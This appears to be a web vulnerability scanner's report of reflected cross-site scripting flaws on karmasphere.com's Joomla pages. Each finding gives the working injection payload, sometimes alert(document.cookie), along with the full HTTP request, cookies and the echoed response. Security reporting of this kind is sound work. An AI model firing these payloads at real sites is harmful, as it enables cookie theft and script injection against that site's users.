HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 03:04:48 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=04f5bd4abc62ba960884e2df1b55400e; path=/ Last-Modified: Mon, 31 Jan 2011 03:04:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <806fd';alert(1)//5a5ba53388c=1&title=Register for Karmasphere Studio Community Edition&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cf4'%3balert(1)//b9045904c was submitted in the REST URL parameter 1. This input was echoed as a0cf4';alert(1)//b9045904c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /componentsa0cf4'%3balert(1)//b9045904c/com_stalytics2/stalytics.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:56:56 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:56:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/componentsa0cf4';alert(1)//b9045904c/com_stalytics2/stalytics.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterve ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfa3'%3balert(1)//d1f7f2977edae7d06 was submitted in the REST URL parameter 1. This input was echoed as 5dfa3';alert(1)//d1f7f2977edae7d06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components5dfa3'%3balert(1)//d1f7f2977edae7d06/com_stalytics2/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e&height=1200&width=1920&colordepth=16&plugins=Chrome PDF Viewer, Google Gears 0.5.33.0, Shockwave Flash, Java Deployment Toolkit 6.0.230.5, Java(TM) Platform SE 6 U23, WPI Detector 1.1, Google Update, Silverlight Plug-In, Default Plug-in HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Origin: http://www.karmasphere.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:55:09 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:55:10 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components5dfa3';alert(1)//d1f7f2977edae7d06/com_stalytics2/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 362ec'%3balert(1)//1a1e70ae29a5f42d9 was submitted in the REST URL parameter 2. This input was echoed as 362ec';alert(1)//1a1e70ae29a5f42d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics2362ec'%3balert(1)//1a1e70ae29a5f42d9/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e&height=1200&width=1920&colordepth=16&plugins=Chrome PDF Viewer, Google Gears 0.5.33.0, Shockwave Flash, Java Deployment Toolkit 6.0.230.5, Java(TM) Platform SE 6 U23, WPI Detector 1.1, Google Update, Silverlight Plug-In, Default Plug-in HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Origin: http://www.karmasphere.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:56:56 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:56:56 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics2362ec';alert(1)//1a1e70ae29a5f42d9/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75355'%3balert(1)//4be87ff6666 was submitted in the REST URL parameter 2. This input was echoed as 75355';alert(1)//4be87ff6666 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics275355'%3balert(1)//4be87ff6666/stalytics.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics275355';alert(1)//4be87ff6666/stalytics.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff6d'%3balert(1)//c9280cd0b5b was submitted in the REST URL parameter 3. This input was echoed as 8ff6d';alert(1)//c9280cd0b5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics2/8ff6d'%3balert(1)//c9280cd0b5b HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:55 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics2/8ff6d';alert(1)//c9280cd0b5b&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3281a'%3balert(1)//e1e418071b4 was submitted in the REST URL parameter 1. This input was echoed as 3281a';alert(1)//e1e418071b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules3281a'%3balert(1)//e1e418071b4/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:53:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:53:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules3281a';alert(1)//e1e418071b4/mod_sp_news_highlighter/assets/css/style.php?width=900> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b00d'%3balert(1)//c76778a4791 was submitted in the REST URL parameter 2. This input was echoed as 7b00d';alert(1)//c76778a4791 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter7b00d'%3balert(1)//c76778a4791/assets/css/style.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:58:08 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:58:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter7b00d';alert(1)//c76778a4791/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeite ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4ce4'%3balert(1)//2450813036d was submitted in the REST URL parameter 3. This input was echoed as c4ce4';alert(1)//2450813036d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assetsc4ce4'%3balert(1)//2450813036d/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:55:53 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:55:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assetsc4ce4';alert(1)//2450813036d/css/style.php?width=900> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 502ee'%3balert(1)//6677cb98bd5 was submitted in the REST URL parameter 4. This input was echoed as 502ee';alert(1)//6677cb98bd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css502ee'%3balert(1)//6677cb98bd5/style.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:35 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:35 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/css502ee';alert(1)//6677cb98bd5/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c56e'%3balert(1)//e28e1c15d7e was submitted in the REST URL parameter 5. This input was echoed as 3c56e';alert(1)//e28e1c15d7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css/3c56e'%3balert(1)//e28e1c15d7e?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:59:02 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:59:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/css/3c56e';alert(1)//e28e1c15d7e?width=900> ...[SNIP]...
The value of the arrows request parameter is copied into the HTML document as plain text between tags. The payload b5d83<img%20src%3da%20onerror%3dalert(1)>4f4823ddc4c was submitted in the arrows parameter. This input was echoed as b5d83<img src=a onerror=alert(1)>4f4823ddc4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.pngb5d83<img%20src%3da%20onerror%3dalert(1)>4f4823ddc4c&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload f5c9a<img%20src%3da%20onerror%3dalert(1)>8f85a556a2c was submitted in the height parameter. This input was echoed as f5c9a<img src=a onerror=alert(1)>8f85a556a2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
